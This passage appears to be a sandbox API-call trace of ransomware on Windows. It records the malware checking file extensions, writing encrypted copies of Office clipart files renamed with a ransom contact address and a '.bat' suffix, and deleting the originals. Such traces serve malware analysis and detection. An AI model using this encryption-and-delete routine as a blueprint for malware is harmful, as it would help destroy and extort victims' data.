(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 68 [0197.148] lstrlenW (lpString=".doc") returned 4 [0197.148] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.148] lstrlenW (lpString=".docx") returned 5 [0197.148] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0197.148] lstrlenW (lpString=".pdf") returned 4 [0197.148] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.148] lstrlenW (lpString=".xls") returned 4 [0197.148] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.148] lstrlenW (lpString=".xlsx") returned 5 [0197.148] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0197.148] lstrlenW (lpString=".ppt") returned 4 [0197.148] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 68 [0197.149] lstrlenW (lpString=".zip") returned 4 [0197.149] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.149] lstrlenW (lpString=".rar") returned 4 [0197.149] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.149] lstrlenW (lpString=".bz2") returned 4 [0197.149] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.149] lstrlenW (lpString=".7z") returned 3 [0197.149] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 68 [0197.149] lstrlenW (lpString=".dbf") returned 4 [0197.149] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 68 [0197.149] lstrlenW (lpString=".1cd") returned 4 [0197.149] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153299.WMF") returned 68 [0197.149] lstrlenW (lpString=".jpg") returned 4 [0197.149] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.149] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.150] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.150] GetLastError () returned 0x0 [0197.150] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x2c84, lpOverlapped=0x0) returned 1 [0197.152] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x2c90, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x2c90, lpOverlapped=0x0) returned 1 [0197.153] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.153] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.153] SetEndOfFile (hFile=0x374) returned 1 [0197.153] CloseHandle (hObject=0x374) returned 1 [0197.153] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.153] SetEndOfFile (hFile=0x360) returned 1 [0197.154] CloseHandle (hObject=0x360) returned 1 [0197.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.154] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0157831.wmf")) returned 1 [0197.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 68 [0197.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 68 [0197.155] lstrlenW (lpString=".doc") returned 4 [0197.155] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.155] lstrlenW (lpString=".docx") returned 5 [0197.155] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0197.155] lstrlenW (lpString=".pdf") returned 4 [0197.155] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.155] lstrlenW (lpString=".xls") returned 4 [0197.155] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.155] lstrlenW (lpString=".xlsx") returned 5 [0197.155] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0197.155] lstrlenW (lpString=".ppt") returned 4 [0197.155] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 68 [0197.155] lstrlenW (lpString=".zip") returned 4 [0197.155] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.156] lstrlenW (lpString=".rar") returned 4 [0197.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.156] lstrlenW (lpString=".bz2") returned 4 [0197.156] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.156] lstrlenW (lpString=".7z") returned 3 [0197.156] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 68 [0197.156] lstrlenW (lpString=".dbf") returned 4 [0197.156] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 68 [0197.156] lstrlenW (lpString=".1cd") returned 4 [0197.156] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0157831.WMF") returned 68 [0197.156] lstrlenW (lpString=".jpg") returned 4 [0197.156] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.156] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.156] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.157] GetLastError () returned 0x0 [0197.157] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x48dc, lpOverlapped=0x0) returned 1 [0197.159] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x48e0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x48e0, lpOverlapped=0x0) returned 1 [0197.160] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.160] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.160] SetEndOfFile (hFile=0x374) returned 1 [0197.160] CloseHandle (hObject=0x374) returned 1 [0197.160] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.161] SetEndOfFile (hFile=0x360) returned 1 [0197.161] CloseHandle (hObject=0x360) returned 1 [0197.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158071.wmf")) returned 1 [0197.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 68 [0197.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 68 [0197.162] lstrlenW (lpString=".doc") returned 4 [0197.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.162] lstrlenW (lpString=".docx") returned 5 [0197.162] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0197.162] lstrlenW (lpString=".pdf") returned 4 [0197.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.163] lstrlenW (lpString=".xls") returned 4 [0197.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.163] lstrlenW (lpString=".xlsx") returned 5 [0197.163] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0197.163] lstrlenW (lpString=".ppt") returned 4 [0197.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 68 [0197.163] lstrlenW (lpString=".zip") returned 4 [0197.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.163] lstrlenW (lpString=".rar") returned 4 [0197.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.163] lstrlenW (lpString=".bz2") returned 4 [0197.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.163] lstrlenW (lpString=".7z") returned 3 [0197.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 68 [0197.163] lstrlenW (lpString=".dbf") returned 4 [0197.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 68 [0197.163] lstrlenW (lpString=".1cd") returned 4 [0197.163] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158071.WMF") returned 68 [0197.163] lstrlenW (lpString=".jpg") returned 4 [0197.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.164] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.164] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.164] GetLastError () returned 0x0 [0197.164] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x462e, lpOverlapped=0x0) returned 1 [0197.166] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x4630, lpOverlapped=0x0) returned 1 [0197.167] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.168] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.168] SetEndOfFile (hFile=0x374) returned 1 [0197.168] CloseHandle (hObject=0x374) returned 1 [0197.168] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.168] SetEndOfFile (hFile=0x360) returned 1 [0197.169] CloseHandle (hObject=0x360) returned 1 [0197.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0158477.wmf")) returned 1 [0197.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 68 [0197.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 68 [0197.170] lstrlenW (lpString=".doc") returned 4 [0197.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.170] lstrlenW (lpString=".docx") returned 5 [0197.170] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0197.170] lstrlenW (lpString=".pdf") returned 4 [0197.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.170] lstrlenW (lpString=".xls") returned 4 [0197.170] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.170] lstrlenW (lpString=".xlsx") returned 5 [0197.170] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0197.170] lstrlenW (lpString=".ppt") returned 4 [0197.170] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 68 [0197.170] lstrlenW (lpString=".zip") returned 4 [0197.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.170] lstrlenW (lpString=".rar") returned 4 [0197.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.170] lstrlenW (lpString=".bz2") returned 4 [0197.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.170] lstrlenW (lpString=".7z") returned 3 [0197.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 68 [0197.171] lstrlenW (lpString=".dbf") returned 4 [0197.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 68 [0197.171] lstrlenW (lpString=".1cd") returned 4 [0197.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0158477.WMF") returned 68 [0197.171] lstrlenW (lpString=".jpg") returned 4 [0197.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.171] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.171] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.172] GetLastError () returned 0x0 [0197.172] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x72de, lpOverlapped=0x0) returned 1 [0197.174] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x72e0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x72e0, lpOverlapped=0x0) returned 1 [0197.176] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.176] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.176] SetEndOfFile (hFile=0x374) returned 1 [0197.176] CloseHandle (hObject=0x374) returned 1 [0197.176] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.176] SetEndOfFile (hFile=0x360) returned 1 [0197.177] CloseHandle (hObject=0x360) returned 1 [0197.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0160590.wmf")) returned 1 [0197.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 68 [0197.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 68 [0197.178] lstrlenW (lpString=".doc") returned 4 [0197.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.178] lstrlenW (lpString=".docx") returned 5 [0197.178] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0197.178] lstrlenW (lpString=".pdf") returned 4 [0197.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.178] lstrlenW (lpString=".xls") returned 4 [0197.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.178] lstrlenW (lpString=".xlsx") returned 5 [0197.178] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0197.178] lstrlenW (lpString=".ppt") returned 4 [0197.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 68 [0197.178] lstrlenW (lpString=".zip") returned 4 [0197.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.178] lstrlenW (lpString=".rar") returned 4 [0197.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.178] lstrlenW (lpString=".bz2") returned 4 [0197.179] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.179] lstrlenW (lpString=".7z") returned 3 [0197.179] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 68 [0197.179] lstrlenW (lpString=".dbf") returned 4 [0197.179] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 68 [0197.179] lstrlenW (lpString=".1cd") returned 4 [0197.179] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0160590.WMF") returned 68 [0197.179] lstrlenW (lpString=".jpg") returned 4 [0197.179] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.179] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.179] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0197.180] GetLastError () returned 0x0 [0197.180] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xb594, lpOverlapped=0x0) returned 1 [0197.473] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xb5a0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xb5a0, lpOverlapped=0x0) returned 1 [0197.587] ReadFile (in: hFile=0x360, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.587] WriteFile (in: hFile=0x374, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.587] SetEndOfFile (hFile=0x374) returned 1 [0197.587] CloseHandle (hObject=0x374) returned 1 [0197.587] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.587] SetEndOfFile (hFile=0x360) returned 1 [0197.588] CloseHandle (hObject=0x360) returned 1 [0197.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0164153.jpg")) returned 1 [0197.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 68 [0197.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 68 [0197.589] lstrlenW (lpString=".doc") returned 4 [0197.589] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0197.589] lstrlenW (lpString=".docx") returned 5 [0197.589] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1 [0197.590] lstrlenW (lpString=".pdf") returned 4 [0197.590] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0197.590] lstrlenW (lpString=".xls") returned 4 [0197.590] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0197.590] lstrlenW (lpString=".xlsx") returned 5 [0197.590] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1 [0197.590] lstrlenW (lpString=".ppt") returned 4 [0197.590] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0197.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 68 [0197.590] lstrlenW (lpString=".zip") returned 4 [0197.590] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.590] lstrlenW (lpString=".rar") returned 4 [0197.590] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.590] lstrlenW (lpString=".bz2") returned 4 [0197.590] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0197.590] lstrlenW (lpString=".7z") returned 3 [0197.590] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0197.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 68 [0197.590] lstrlenW (lpString=".dbf") returned 4 [0197.590] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 68 [0197.590] lstrlenW (lpString=".1cd") returned 4 [0197.590] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0197.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0164153.JPG") returned 68 [0197.590] lstrlenW (lpString=".jpg") returned 